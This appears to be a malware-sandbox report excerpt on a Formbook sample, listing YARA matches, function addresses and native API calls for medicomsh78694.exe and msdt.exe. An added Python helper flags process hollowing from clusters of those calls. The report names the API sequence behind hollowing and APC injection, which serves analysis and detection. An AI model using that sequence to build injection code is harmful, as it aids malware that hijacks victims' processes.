Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Document has an unknown application name
Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.dr OLE indicator application name: unknown
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_0037F108 4_2_0037F108
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_003706CC 4_2_003706CC
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_004414F0 4_2_004414F0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_00441D51 4_2_00441D51
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_00445E40 4_2_00445E40
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_00442752 4_2_00442752
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_00445450 4_2_00445450
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_00445C78 4_2_00445C78
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_00445808 4_2_00445808
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_00449820 4_2_00449820
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_004468C8 4_2_004468C8
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_004404E7 4_2_004404E7
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_00445C88 4_2_00445C88
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_004414BD 4_2_004414BD
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_0044B588 4_2_0044B588
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_004445A0 4_2_004445A0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_004445B0 4_2_004445B0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_00445A60 4_2_00445A60
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_00443668 4_2_00443668
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_0044CE00 4_2_0044CE00
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_004457FA 4_2_004457FA
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_00AD79AE 4_2_00AD79AE
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00401026 5_2_00401026
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0041D034 5_2_0041D034
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0041C0C7 5_2_0041C0C7
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0041C969 5_2_0041C969
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00401174 5_2_00401174
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0041B93E 5_2_0041B93E
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00408C90 5_2_00408C90
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BBE0C6 5_2_00BBE0C6
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BED005 5_2_00BED005
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BD905A 5_2_00BD905A
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BC3040 5_2_00BC3040
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BBE2E9 5_2_00BBE2E9
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00C61238 5_2_00C61238
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BE63DB 5_2_00BE63DB
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BBF3CF 5_2_00BBF3CF
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00C663BF 5_2_00C663BF
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BC2305 5_2_00BC2305
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00C0A37B 5_2_00C0A37B
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BC7353 5_2_00BC7353
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BD1489 5_2_00BD1489
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BF5485 5_2_00BF5485
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BFD47D 5_2_00BFD47D
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BDC5F0 5_2_00BDC5F0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00C06540 5_2_00C06540
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BC351F 5_2_00BC351F
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BC4680 5_2_00BC4680
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BCE6C1 5_2_00BCE6C1
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00C62622 5_2_00C62622
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00C0A634 5_2_00C0A634
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BCC7BC 5_2_00BCC7BC
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00C4579A 5_2_00C4579A
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BF57C3 5_2_00BF57C3
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00C5F8EE 5_2_00C5F8EE
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00AD79AE 5_2_00AD79AE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_026A1238 7_2_026A1238
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025FE2E9 7_2_025FE2E9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0264A37B 7_2_0264A37B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02607353 7_2_02607353
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02602305 7_2_02602305
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025FF3CF 7_2_025FF3CF
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_026263DB 7_2_026263DB
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_026A63BF 7_2_026A63BF
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02603040 7_2_02603040
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0261905A 7_2_0261905A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0262D005 7_2_0262D005
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025FE0C6 7_2_025FE0C6
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_026A2622 7_2_026A2622
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0264A634 7_2_0264A634
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0260E6C1 7_2_0260E6C1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02604680 7_2_02604680
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_026357C3 7_2_026357C3
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0260C7BC 7_2_0260C7BC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0268579A 7_2_0268579A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0263D47D 7_2_0263D47D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0268443E 7_2_0268443E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02635485 7_2_02635485
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02611489 7_2_02611489
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02646540 7_2_02646540
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0260351F 7_2_0260351F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0261C5F0 7_2_0261C5F0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_026B3A83 7_2_026B3A83
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02627B00 7_2_02627B00
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025FFBD7 7_2_025FFBD7
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0268DBDA 7_2_0268DBDA
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_026ACBA4 7_2_026ACBA4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0262286D 7_2_0262286D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0260C85C 7_2_0260C85C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0269F8EE 7_2_0269F8EE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0268394B 7_2_0268394B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02685955 7_2_02685955
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_026169FE 7_2_026169FE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_026029B2 7_2_026029B2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_026A098E 7_2_026A098E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0261EE4C 7_2_0261EE4C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02632E2F 7_2_02632E2F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0262DF7C 7_2_0262DF7C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02610F3F 7_2_02610F3F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02672FDC 7_2_02672FDC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0269CFB1 7_2_0269CFB1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0260CD5B 7_2_0260CD5B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_02630D3B 7_2_02630D3B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0269FDDD 7_2_0269FDDD
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0009D034 7_2_0009D034
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0009C0C5 7_2_0009C0C5
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 02643F92 appears 132 times
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 0264373B appears 244 times
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 0266F970 appears 84 times
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 025FE2A8 appears 38 times
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 025FDF5C appears 119 times
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: String function: 00C2F970 appears 46 times
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: String function: 00BBDF5C appears 65 times
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: String function: 00C0373B appears 109 times
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: String function: 00C03F92 appears 72 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_004185F0 NtCreateFile, 5_2_004185F0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_004186A0 NtReadFile, 5_2_004186A0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00418720 NtClose, 5_2_00418720
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_004187D0 NtAllocateVirtualMemory, 5_2_004187D0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_004185EA NtCreateFile, 5_2_004185EA
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00418642 NtCreateFile, 5_2_00418642
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0041869A NtReadFile, 5_2_0041869A
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0041871A NtClose, 5_2_0041871A
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_004187CA NtAllocateVirtualMemory, 5_2_004187CA
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BB00C4 NtCreateFile,LdrInitializeThunk, 5_2_00BB00C4
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BB0078 NtResumeThread,LdrInitializeThunk, 5_2_00BB0078
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BB0048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00BB0048
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BB07AC NtCreateMutant,LdrInitializeThunk, 5_2_00BB07AC
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAF9F0 NtClose,LdrInitializeThunk, 5_2_00BAF9F0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAF900 NtReadFile,LdrInitializeThunk, 5_2_00BAF900
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_00BAFAE8
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_00BAFAD0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_00BAFBB8
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_00BAFB68
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_00BAFC90
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_00BAFC60
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFD8C NtDelayExecution,LdrInitializeThunk, 5_2_00BAFD8C
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_00BAFDC0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_00BAFEA0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_00BAFED0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFFB4 NtCreateSection,LdrInitializeThunk, 5_2_00BAFFB4
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BB10D0 NtOpenProcessToken, 5_2_00BB10D0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BB0060 NtQuerySection, 5_2_00BB0060
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BB01D4 NtSetValueKey, 5_2_00BB01D4
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BB010C NtOpenDirectoryObject, 5_2_00BB010C
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BB1148 NtOpenThread, 5_2_00BB1148
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F00C4 NtCreateFile,LdrInitializeThunk, 7_2_025F00C4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F07AC NtCreateMutant,LdrInitializeThunk, 7_2_025F07AC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_025EFAD0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_025EFAE8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFAB8 NtQueryValueKey,LdrInitializeThunk, 7_2_025EFAB8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFB50 NtCreateKey,LdrInitializeThunk, 7_2_025EFB50
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_025EFB68
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_025EFBB8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EF900 NtReadFile,LdrInitializeThunk, 7_2_025EF900
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EF9F0 NtClose,LdrInitializeThunk, 7_2_025EF9F0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_025EFED0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFFB4 NtCreateSection,LdrInitializeThunk, 7_2_025EFFB4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_025EFC60
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_025EFDC0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFD8C NtDelayExecution,LdrInitializeThunk, 7_2_025EFD8C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F0048 NtProtectVirtualMemory, 7_2_025F0048
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F0078 NtResumeThread, 7_2_025F0078
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F0060 NtQuerySection, 7_2_025F0060
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F10D0 NtOpenProcessToken, 7_2_025F10D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F1148 NtOpenThread, 7_2_025F1148
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F010C NtOpenDirectoryObject, 7_2_025F010C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F01D4 NtSetValueKey, 7_2_025F01D4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFA50 NtEnumerateValueKey, 7_2_025EFA50
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFA20 NtQueryInformationFile, 7_2_025EFA20
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFBE8 NtQueryVirtualMemory, 7_2_025EFBE8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EF8CC NtWaitForSingleObject, 7_2_025EF8CC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EF938 NtWriteFile, 7_2_025EF938
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F1930 NtSetContextThread, 7_2_025F1930
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFE24 NtWriteVirtualMemory, 7_2_025EFE24
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFEA0 NtReadVirtualMemory, 7_2_025EFEA0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFF34 NtQueueApcThread, 7_2_025EFF34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFFFC NtCreateProcessEx, 7_2_025EFFFC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFC48 NtSetInformationFile, 7_2_025EFC48
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F0C40 NtGetContextThread, 7_2_025F0C40
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFC30 NtOpenProcess, 7_2_025EFC30
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFC90 NtUnmapViewOfSection, 7_2_025EFC90
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFD5C NtEnumerateKey, 7_2_025EFD5C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F1D80 NtSuspendThread, 7_2_025F1D80
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_000985F0 NtCreateFile, 7_2_000985F0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_000986A0 NtReadFile, 7_2_000986A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_00098720 NtClose, 7_2_00098720
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_000987D0 NtAllocateVirtualMemory, 7_2_000987D0
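The Nt* names above are the native calls the sandbox resolved at each caller address. Taken one at a time most of them are unremarkable (every process creates, reads and closes files), so the useful reading is which calls cluster inside a single process: NtCreateProcessEx, NtUnmapViewOfSection, NtCreateSection/NtMapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtQueueApcThread and NtResumeThread together are the primitives of process hollowing and thread hijacking, which is what the "Sample uses process hollowing technique" and "Queues an APC in another process" verdicts rest on. The Python below is an added triage helper, not part of the Joe Sandbox report or its tooling: it parses lines in the report's own "Code function" shape, collects the Nt* calls per process and checks which hollowing stages the set covers. The sample lines are a subset copied from the report; the stage grouping and the rule that image replacement plus thread control in one process is the hollowing tell are this example's own assumptions.

```python
from collections import defaultdict

# Constructed sample in the shape of the report's "Code function" lines:
# "Source: <process> Code function: <id> <api>,<api>, <id>". The lines are a subset
# copied from the report; the first one carries no API name and must be skipped.
SAMPLE_LINES = r"""
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_026A1238 7_2_026A1238
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFFB4 NtCreateSection,LdrInitializeThunk, 7_2_025EFFB4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_025EFC60
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFC90 NtUnmapViewOfSection, 7_2_025EFC90
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFE24 NtWriteVirtualMemory, 7_2_025EFE24
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F1930 NtSetContextThread, 7_2_025F1930
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFF34 NtQueueApcThread, 7_2_025EFF34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025F0078 NtResumeThread, 7_2_025F0078
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025EFFFC NtCreateProcessEx, 7_2_025EFFFC
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_004185F0 NtCreateFile, 5_2_004185F0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_004186A0 NtReadFile, 5_2_004186A0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFFB4 NtCreateSection,LdrInitializeThunk, 5_2_00BAFFB4
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_00BAFC60
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BAFC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_00BAFC90
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BB0078 NtResumeThread,LdrInitializeThunk, 5_2_00BB0078
"""

# Stages of process hollowing keyed by the native calls that implement them (this
# grouping is the example's own). Any single call is benign; one process covering
# image replacement and thread control together is the hollowing pattern.
STAGES = {
    "obtain_target": {"NtCreateProcess", "NtCreateProcessEx", "NtCreateUserProcess", "NtOpenProcess"},
    "replace_image": {"NtUnmapViewOfSection", "NtCreateSection", "NtMapViewOfSection", "NtWriteVirtualMemory"},
    "hijack_thread": {"NtSetContextThread", "NtQueueApcThread", "NtResumeThread"},
}


def parse_native_calls(report_text):
    """Map each process path to the set of Nt* functions the report attributes to it."""
    calls = defaultdict(set)
    for line in report_text.splitlines():
        if not line.startswith("Source: ") or " Code function: " not in line:
            continue
        proc, rest = line[len("Source: "):].split(" Code function: ", 1)
        tokens = rest.split()
        # tokens[0] and tokens[-1] are the analysis ids; whatever sits between is the API list
        for chunk in tokens[1:-1]:
            for api in chunk.split(","):
                if api.startswith("Nt"):
                    calls[proc].add(api)
    return dict(calls)


def classify_processes(calls):
    """Per process: which stages are covered and whether the combination looks like hollowing."""
    result = {}
    for proc, apis in calls.items():
        stages = sorted(name for name, needed in STAGES.items() if apis & needed)
        result[proc] = {
            "apis": sorted(apis),
            "stages": stages,
            "suspicious": "replace_image" in stages and "hijack_thread" in stages,
        }
    return result


def analyze_report(report_text):
    return classify_processes(parse_native_calls(report_text))


if __name__ == "__main__":
    for proc, info in analyze_report(SAMPLE_LINES).items():
        print("SUSPICIOUS" if info["suspicious"] else "ok", proc, info["stages"])
```

Run against the full report rather than the excerpt, both medicomsh78694.exe and msdt.exe cover all three stages; explorer.exe has no "Code function" lines, so a tree-based check (parent/child) is needed to see the hop through it.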
Document misses a certain OLE stream usually present in this Microsoft Office document type
